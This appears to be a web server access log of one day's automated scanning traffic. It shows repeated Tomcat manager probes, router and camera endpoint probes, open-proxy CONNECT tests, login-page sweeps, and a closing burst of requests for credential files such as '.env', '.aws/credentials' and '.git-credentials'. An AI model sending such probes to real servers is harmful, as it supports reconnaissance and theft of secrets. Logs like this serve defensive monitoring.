114.80.33.21 - - [21/Jul/2026:11:03:46 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:11:07:27 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
94.154.43.114 - - [21/Jul/2026:11:08:49 +0200] "GET /login HTTP/1.1" 404 723
152.42.193.189 - - [21/Jul/2026:11:09:04 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
94.154.43.230 - - [21/Jul/2026:11:09:43 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
114.80.33.21 - - [21/Jul/2026:11:10:59 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:11:14:39 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:11:18:12 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
165.154.11.202 - - [21/Jul/2026:11:18:16 +0200] "GET / HTTP/1.1" 200 1895
165.154.11.202 - - [21/Jul/2026:11:18:16 +0200] "-" 400 1930
64.62.156.172 - - [21/Jul/2026:11:19:02 +0200] "-" 400 1930
114.80.33.21 - - [21/Jul/2026:11:21:56 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:11:25:25 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
94.154.43.230 - - [21/Jul/2026:11:28:50 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
114.80.33.21 - - [21/Jul/2026:11:29:08 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:11:32:38 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:11:36:24 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:11:39:51 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:11:43:30 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:11:47:04 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:11:50:44 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:11:54:16 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:11:57:57 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:12:01:29 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:12:05:09 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:12:08:42 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:12:12:23 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
167.71.200.67 - - [21/Jul/2026:12:13:32 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
114.80.33.21 - - [21/Jul/2026:12:15:55 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:12:19:43 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:12:23:08 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:12:26:48 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:12:30:21 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:12:34:02 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:12:37:35 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:12:41:20 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:12:44:47 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
45.198.224.5 - - [21/Jul/2026:12:46:10 +0200] "GET /login HTTP/1.1" 404 723
18.97.5.22 - - [21/Jul/2026:12:48:03 +0200] "GET / HTTP/1.1" 200 1895
114.80.33.21 - - [21/Jul/2026:12:48:27 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
152.42.193.189 - - [21/Jul/2026:12:51:35 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
114.80.33.21 - - [21/Jul/2026:12:52:00 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:12:55:46 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
172.105.199.92 - - [21/Jul/2026:12:58:31 +0200] "CONNECT httpbin.org:443 HTTP/1.1" 400 804
172.105.199.92 - - [21/Jul/2026:12:58:32 +0200] "CONNECT api.myip.la:443 HTTP/1.1" 400 804
114.80.33.21 - - [21/Jul/2026:12:59:12 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:13:02:52 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:13:06:25 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:13:10:04 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:13:13:38 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:13:17:20 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:13:20:52 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:13:24:32 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
195.178.110.137 - - [21/Jul/2026:13:25:05 +0200] "-" 400 1930
195.178.110.137 - - [21/Jul/2026:13:25:05 +0200] "-" 400 1930
195.178.110.137 - - [21/Jul/2026:13:25:05 +0200] "CONNECT 104.16.184.241:443 HTTP/1.1" 400 804
114.80.33.21 - - [21/Jul/2026:13:28:04 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:13:31:44 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
206.189.147.151 - - [21/Jul/2026:13:32:57 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
114.80.33.21 - - [21/Jul/2026:13:35:17 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
152.42.202.111 - - [21/Jul/2026:13:37:57 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
114.80.33.21 - - [21/Jul/2026:13:38:58 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:13:42:31 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:13:46:08 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
167.71.200.67 - - [21/Jul/2026:13:49:06 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
114.80.33.21 - - [21/Jul/2026:13:49:43 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
47.254.178.204 - - [21/Jul/2026:13:50:07 +0200] "OPTIONS / HTTP/1.0" 200 -
47.254.178.204 - - [21/Jul/2026:13:50:07 +0200] "GET / HTTP/1.1" 200 1895
114.80.33.21 - - [21/Jul/2026:13:53:23 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:13:56:56 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:14:00:37 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
45.198.224.244 - - [21/Jul/2026:14:00:57 +0200] "GET / HTTP/1.1" 200 1895
45.198.224.244 - - [21/Jul/2026:14:00:58 +0200] "POST / HTTP/1.1" 200 1895
45.198.224.244 - - [21/Jul/2026:14:00:59 +0200] "POST /_next HTTP/1.1" 404 723
45.198.224.244 - - [21/Jul/2026:14:01:00 +0200] "POST /api HTTP/1.1" 404 721
45.198.224.244 - - [21/Jul/2026:14:01:00 +0200] "POST /_next/server HTTP/1.1" 404 734
45.198.224.244 - - [21/Jul/2026:14:01:00 +0200] "POST /app HTTP/1.1" 404 721
45.198.224.244 - - [21/Jul/2026:14:01:01 +0200] "POST /api/route HTTP/1.1" 404 731
114.80.33.21 - - [21/Jul/2026:14:04:08 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:14:07:55 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:14:11:22 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:14:15:02 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:14:18:35 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
94.154.43.243 - - [21/Jul/2026:14:20:45 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 737
114.80.33.21 - - [21/Jul/2026:14:22:16 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:14:25:48 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:14:29:26 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
195.201.169.60 - - [21/Jul/2026:14:31:02 +0200] "-" 400 1930
195.201.169.60 - - [21/Jul/2026:14:31:02 +0200] "GET / HTTP/1.1" 200 1895
195.201.169.60 - - [21/Jul/2026:14:31:02 +0200] "GET / HTTP/1.1" 200 1895
195.201.169.60 - - [21/Jul/2026:14:31:02 +0200] "HEAD /_next/static/ HTTP/1.1" 404 -
114.80.33.21 - - [21/Jul/2026:14:33:00 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:14:36:41 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:14:40:13 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:14:43:53 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:14:47:26 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
66.132.195.35 - - [21/Jul/2026:14:47:58 +0200] "-" 400 1930
66.132.195.35 - - [21/Jul/2026:14:48:01 +0200] "GET / HTTP/1.1" 200 1895
66.132.195.35 - - [21/Jul/2026:14:48:09 +0200] "GET /favicon.ico HTTP/1.1" 404 729
66.132.195.35 - - [21/Jul/2026:14:49:06 +0200] "-" 400 1930
66.132.195.35 - - [21/Jul/2026:14:49:07 +0200] "GET /robots.txt HTTP/1.1" 404 728
114.80.33.21 - - [21/Jul/2026:14:51:11 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:14:54:39 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
204.76.203.30 - - [21/Jul/2026:14:54:41 +0200] "GET /json/ HTTP/1.1" 404 727
114.80.33.21 - - [21/Jul/2026:14:58:18 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:15:01:52 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:15:05:33 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
94.154.43.140 - - [21/Jul/2026:15:06:19 +0200] "GET /login HTTP/1.1" 404 723
91.231.89.112 - - [21/Jul/2026:15:09:01 +0200] "-" 400 1930
91.231.89.116 - - [21/Jul/2026:15:09:05 +0200] "GET / HTTP/1.1" 200 1895
114.80.33.21 - - [21/Jul/2026:15:09:05 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
91.231.89.226 - - [21/Jul/2026:15:11:35 +0200] "GET /favicon.ico HTTP/1.1" 404 729
114.80.33.21 - - [21/Jul/2026:15:12:47 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
66.132.172.174 - - [21/Jul/2026:15:13:54 +0200] "GET / HTTP/1.1" 200 1895
66.132.172.174 - - [21/Jul/2026:15:13:57 +0200] "-" 400 1930
66.132.172.174 - - [21/Jul/2026:15:13:57 +0200] "GET / HTTP/1.1" 200 1895
66.132.172.174 - - [21/Jul/2026:15:13:58 +0200] "GET /favicon.ico HTTP/1.1" 404 729
66.132.172.174 - - [21/Jul/2026:15:14:01 +0200] "-" 400 1930
66.132.172.174 - - [21/Jul/2026:15:14:01 +0200] "GET /login HTTP/1.1" 404 723
51.159.125.199 - - [21/Jul/2026:15:14:43 +0200] "GET / HTTP/1.0" 200 1895
51.159.125.199 - - [21/Jul/2026:15:15:47 +0200] "GET / HTTP/1.0" 200 1895
152.42.202.111 - - [21/Jul/2026:15:15:50 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
51.159.125.199 - - [21/Jul/2026:15:15:59 +0200] "-" 400 1930
51.159.125.199 - - [21/Jul/2026:15:16:05 +0200] "GET / HTTP/1.1" 200 1895
51.159.125.199 - - [21/Jul/2026:15:16:05 +0200] "GET /manage/account/login HTTP/1.1" 404 746
51.159.125.199 - - [21/Jul/2026:15:16:05 +0200] "GET /admin/index.html HTTP/1.1" 404 738
51.159.125.199 - - [21/Jul/2026:15:16:05 +0200] "GET /index.html HTTP/1.1" 200 1895
51.159.125.199 - - [21/Jul/2026:15:16:05 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 740
51.159.125.199 - - [21/Jul/2026:15:16:05 +0200] "GET /cgi-bin/login.cgi HTTP/1.1" 404 739
51.159.125.199 - - [21/Jul/2026:15:16:05 +0200] "GET /login.htm HTTP/1.1" 404 727
51.159.125.199 - - [21/Jul/2026:15:16:05 +0200] "GET /login.html HTTP/1.1" 404 728
51.159.125.199 - - [21/Jul/2026:15:16:05 +0200] "GET /login.jsp HTTP/1.1" 404 727
51.159.125.199 - - [21/Jul/2026:15:16:05 +0200] "GET /login HTTP/1.1" 404 723
51.159.125.199 - - [21/Jul/2026:15:16:05 +0200] "GET /doc/index.html HTTP/1.1" 404 736
51.159.125.199 - - [21/Jul/2026:15:16:05 +0200] "GET /remote/login HTTP/1.1" 404 734
51.159.125.199 - - [21/Jul/2026:15:16:05 +0200] "GET /admin/login.asp HTTP/1.1" 404 737
51.159.125.199 - - [21/Jul/2026:15:16:05 +0200] "GET /web/ HTTP/1.1" 404 726
51.159.125.199 - - [21/Jul/2026:15:16:05 +0200] "GET /webpages/login.html HTTP/1.1" 404 741
51.159.125.199 - - [21/Jul/2026:15:16:05 +0200] "GET /favicon.ico HTTP/1.1" 404 729
114.80.33.21 - - [21/Jul/2026:15:16:18 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
195.182.16.23 - - [21/Jul/2026:15:19:29 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 737
114.80.33.21 - - [21/Jul/2026:15:19:58 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:15:23:31 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
185.242.3.20 - - [21/Jul/2026:15:26:12 +0200] "GET /login HTTP/1.1" 404 723
114.80.33.21 - - [21/Jul/2026:15:27:19 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:15:30:44 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:15:34:24 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:15:37:56 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:15:41:38 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:15:45:09 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:15:48:49 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:15:52:22 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:15:56:05 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
94.154.43.230 - - [21/Jul/2026:15:58:07 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
114.80.33.21 - - [21/Jul/2026:15:59:36 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:16:03:15 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
5.61.209.92 - - [21/Jul/2026:16:04:01 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 737
114.80.33.21 - - [21/Jul/2026:16:06:48 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:16:10:29 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:16:14:01 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:16:17:49 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:16:21:14 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:16:24:54 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:16:28:27 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
94.154.43.114 - - [21/Jul/2026:16:30:32 +0200] "GET /login HTTP/1.1" 404 723
114.80.33.21 - - [21/Jul/2026:16:32:09 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:16:35:40 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:16:39:20 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
204.76.203.30 - - [21/Jul/2026:16:41:16 +0200] "GET /json/ HTTP/1.1" 404 727
114.80.33.21 - - [21/Jul/2026:16:42:53 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
194.165.16.11 - - [21/Jul/2026:16:44:06 +0200] "GET /_something_.cfm HTTP/1.1" 404 733
114.80.33.21 - - [21/Jul/2026:16:46:33 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:16:50:06 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
44.220.185.66 - - [21/Jul/2026:16:50:14 +0200] "GET / HTTP/1.1" 200 1895
114.80.33.21 - - [21/Jul/2026:16:53:46 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:16:57:19 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:17:01:01 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:17:04:32 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:17:08:15 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:17:11:45 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:17:15:27 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:17:18:58 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:17:22:39 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:17:26:12 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
45.198.224.5 - - [21/Jul/2026:17:27:28 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
114.80.33.21 - - [21/Jul/2026:17:29:51 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:17:33:24 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:17:37:10 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:17:40:37 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:17:44:17 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:17:47:50 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:17:51:29 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:17:55:04 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:17:58:44 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:18:02:15 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
162.19.74.210 - - [21/Jul/2026:18:05:36 +0200] "-" 400 1930
162.19.74.210 - - [21/Jul/2026:18:05:36 +0200] "GET / HTTP/1.1" 200 1895
162.19.74.210 - - [21/Jul/2026:18:05:36 +0200] "GET / HTTP/1.1" 200 1895
162.19.74.210 - - [21/Jul/2026:18:05:36 +0200] "HEAD /_next/static/ HTTP/1.1" 404 -
114.80.33.21 - - [21/Jul/2026:18:05:56 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:18:09:28 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:18:13:08 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:18:16:42 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:18:20:22 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:18:23:54 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
94.154.43.243 - - [21/Jul/2026:18:27:34 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 737
114.80.33.21 - - [21/Jul/2026:18:27:35 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:18:31:07 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:18:34:49 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
194.165.16.11 - - [21/Jul/2026:18:37:24 +0200] "GET /CFIDE/administrator/images/mx_login.gif HTTP/1.1" 404 769
194.165.16.11 - - [21/Jul/2026:18:37:24 +0200] "GET /cfide/administrator/images/mx_login.gif HTTP/1.1" 404 769
194.165.16.11 - - [21/Jul/2026:18:37:24 +0200] "GET /CFIDE/administrator/images/background.jpg HTTP/1.1" 404 771
194.165.16.11 - - [21/Jul/2026:18:37:24 +0200] "GET /cfide/administrator/images/background.jpg HTTP/1.1" 404 771
194.165.16.11 - - [21/Jul/2026:18:37:24 +0200] "GET /CFIDE/administrator/images/componentutilslogin.jpg HTTP/1.1" 404 780
194.165.16.11 - - [21/Jul/2026:18:37:25 +0200] "GET /cfide/administrator/images/componentutilslogin.jpg HTTP/1.1" 404 780
114.80.33.21 - - [21/Jul/2026:18:38:20 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:18:42:00 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:18:45:33 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:18:49:18 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:18:52:46 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:18:56:27 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:18:59:59 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:19:03:39 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:19:07:11 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:19:10:53 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:19:14:24 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
193.8.186.29 - - [21/Jul/2026:19:15:45 +0200] "-" 400 1930
193.8.186.29 - - [21/Jul/2026:19:15:45 +0200] "GET / HTTP/1.1" 200 1895
114.80.33.21 - - [21/Jul/2026:19:18:05 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:19:21:37 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:19:25:17 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:19:28:50 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
94.154.43.99 - - [21/Jul/2026:19:32:28 +0200] "-" 400 1930
94.154.43.99 - - [21/Jul/2026:19:32:28 +0200] "-" 400 1930
114.80.33.21 - - [21/Jul/2026:19:32:31 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:19:36:03 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:19:39:43 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
38.60.212.223 - - [21/Jul/2026:19:42:32 +0200] "-" 400 1930
38.60.212.223 - - [21/Jul/2026:19:42:33 +0200] "-" 400 1930
38.60.212.223 - - [21/Jul/2026:19:42:34 +0200] "-" 400 1930
38.60.212.223 - - [21/Jul/2026:19:42:35 +0200] "-" 400 1930
38.60.212.223 - - [21/Jul/2026:19:42:38 +0200] "-" 400 1930
38.60.212.223 - - [21/Jul/2026:19:42:43 +0200] "-" 400 1930
114.80.33.21 - - [21/Jul/2026:19:43:15 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
45.205.1.242 - - [21/Jul/2026:19:43:48 +0200] "GET / HTTP/1.1" 200 1895
45.205.1.242 - - [21/Jul/2026:19:43:51 +0200] "GET /favicon.ico HTTP/1.1" 404 729
94.154.43.230 - - [21/Jul/2026:19:45:10 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
114.80.33.21 - - [21/Jul/2026:19:46:56 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
94.154.43.140 - - [21/Jul/2026:19:47:14 +0200] "GET /login HTTP/1.1" 404 723
114.80.33.21 - - [21/Jul/2026:19:50:28 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
45.205.1.240 - - [21/Jul/2026:19:50:37 +0200] "GET / HTTP/1.1" 200 1895
45.205.1.240 - - [21/Jul/2026:19:50:39 +0200] "GET /favicon.ico HTTP/1.1" 404 729
114.80.33.21 - - [21/Jul/2026:19:54:08 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:19:57:41 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
118.70.233.33 - - [21/Jul/2026:19:59:38 +0200] "-" 400 1930
114.80.33.21 - - [21/Jul/2026:20:01:22 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
141.98.11.11 - - [21/Jul/2026:20:02:30 +0200] "GET / HTTP/1.1" 200 1895
114.80.33.21 - - [21/Jul/2026:20:04:54 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:20:08:35 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:20:12:07 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:20:15:48 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:20:19:20 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
114.80.33.21 - - [21/Jul/2026:20:23:02 +0200] "GET /manager/text/list HTTP/1.1" 401 2499
45.148.10.200 - - [21/Jul/2026:20:26:12 +0200] "-" 400 1930
45.148.10.200 - - [21/Jul/2026:20:26:12 +0200] "GET / HTTP/1.1" 200 1895
45.148.10.200 - - [21/Jul/2026:20:26:12 +0200] "-" 400 1930
45.148.10.200 - - [21/Jul/2026:20:26:12 +0200] "GET / HTTP/1.1" 200 1895
45.148.10.200 - - [21/Jul/2026:20:26:12 +0200] "GET /actuator/env HTTP/1.1" 404 734
45.148.10.200 - - [21/Jul/2026:20:26:12 +0200] "GET /appsettings.json HTTP/1.1" 404 734
45.148.10.200 - - [21/Jul/2026:20:26:12 +0200] "GET /.env.production HTTP/1.1" 404 733
45.148.10.200 - - [21/Jul/2026:20:26:12 +0200] "GET /.env.prod HTTP/1.1" 404 727
45.148.10.200 - - [21/Jul/2026:20:26:12 +0200] "GET /.env.old HTTP/1.1" 404 726
45.148.10.200 - - [21/Jul/2026:20:26:12 +0200] "GET /app/.env HTTP/1.1" 404 730
45.148.10.200 - - [21/Jul/2026:20:26:12 +0200] "GET /phpinfo.php HTTP/1.1" 404 729
45.148.10.200 - - [21/Jul/2026:20:26:12 +0200] "GET /.env HTTP/1.1" 404 722
45.148.10.200 - - [21/Jul/2026:20:26:12 +0200] "GET /.env.staging HTTP/1.1" 404 730
45.148.10.200 - - [21/Jul/2026:20:26:13 +0200] "GET /.env.backup HTTP/1.1" 404 729
45.148.10.200 - - [21/Jul/2026:20:26:13 +0200] "GET /.git/config HTTP/1.1" 404 733
45.148.10.200 - - [21/Jul/2026:20:26:13 +0200] "GET /.git-credentials HTTP/1.1" 404 734
45.148.10.200 - - [21/Jul/2026:20:26:13 +0200] "GET /.aws/credentials HTTP/1.1" 404 738
45.148.10.200 - - [21/Jul/2026:20:26:13 +0200] "GET /terraform.tfstate HTTP/1.1" 404 735
45.148.10.200 - - [21/Jul/2026:20:26:13 +0200] "GET /info.php HTTP/1.1" 404 726
